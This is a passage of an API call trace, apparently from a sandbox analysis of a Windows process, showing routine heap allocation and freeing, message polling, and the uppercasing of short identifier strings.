hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0160.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0160.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0160.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0160.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0160.690] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0160.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0160.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0160.690] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0160.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0160.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0160.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0160.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0160.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0160.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0160.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0160.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0160.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0160.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0160.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0160.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0160.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0160.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0160.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0160.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0160.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0160.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0160.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0160.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0160.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0160.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0160.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0160.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0160.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0160.691] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0160.691] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0160.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0160.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0160.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0160.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0160.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0160.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0160.691] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0160.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0160.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0160.691] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0160.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0160.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0160.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0160.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1bc8 [0160.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0160.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0160.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0160.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0160.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0160.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c48 [0160.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0160.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0160.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0160.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa7a0 [0160.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0160.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0160.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0160.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0160.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0160.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0160.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0160.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0160.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0160.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0160.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0160.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0160.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0160.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0160.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa610 [0160.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0160.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa778 [0160.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0160.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0160.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0160.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0160.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0160.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0160.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0160.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0160.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0160.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0160.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0160.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0160.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0160.693] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0160.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0160.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0160.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0160.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0160.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0160.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0160.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0160.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0160.694] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0160.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0160.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0160.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0160.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0160.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0160.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0160.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0160.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0160.694] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0160.694] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0160.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0160.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0160.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0160.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0160.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0160.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0160.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0160.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0160.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0160.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0160.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0160.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0160.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0160.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0160.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0160.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0160.695] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0160.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0160.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0160.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0160.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0160.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0160.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0160.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0160.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0160.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0160.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0160.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0160.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0160.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0160.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0160.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0160.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0160.697] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0160.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0160.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0160.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0160.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0160.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0160.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0160.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0160.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0160.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0160.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0160.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0160.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0160.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0160.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0160.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0160.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0160.697] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0160.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0160.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0160.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0160.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0160.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0160.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0160.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0160.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0160.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0160.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0160.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0160.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0160.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0160.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0160.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0160.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0160.698] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0160.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0160.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0160.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0160.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0160.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0160.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0160.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0160.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0160.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0160.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0160.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0160.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0160.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0160.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0160.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0160.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0160.699] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0160.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0160.699] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0160.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0160.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0160.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa740 [0160.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0160.699] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0160.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0160.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0160.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0160.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0160.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0160.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0160.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0160.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0160.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0160.700] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0160.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0160.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0160.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0160.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0160.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0160.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0160.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0160.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0160.700] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0160.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: 